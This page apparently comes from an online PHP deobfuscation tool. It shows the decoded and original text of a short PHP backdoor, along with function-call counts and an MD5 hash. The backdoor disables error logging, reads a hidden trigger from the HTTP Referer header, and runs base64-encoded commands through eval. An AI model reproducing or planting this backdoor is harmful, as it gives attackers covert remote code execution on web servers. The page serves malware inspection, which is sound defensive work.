Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php ini_set('error_log', '/dev/null'); parse_str($_SERVER['HTTP_REFERER'], $a); if (re..

Decoded Output download

<?php ini_set('error_log', '/dev/null'); 
parse_str($_SERVER['HTTP_REFERER'], $a); 
if (reset($a) == '12' && count($a) == 9) { 
    echo '<3456>'; 
    eval(base64_decode(str_replace(" ", "+", join(array_slice($a, count($a) - 3))))); 
    echo '</3456>'; 
} ?>

Did this file decode correctly?

Original Code

<?php ini_set('error_log', '/dev/null');
parse_str($_SERVER['HTTP_REFERER'], $a);
if (reset($a) == '12' && count($a) == 9) {
    echo '<3456>';
    eval(base64_decode(str_replace(" ", "+", join(array_slice($a, count($a) - 3)))));
    echo '</3456>';
}

Function Calls

ini_set 1
parse_str 1

Variables

None

Stats

MD5 41471531abaedf419cfff8b5b55ecbff
Eval Count 0
Decode Time 102 ms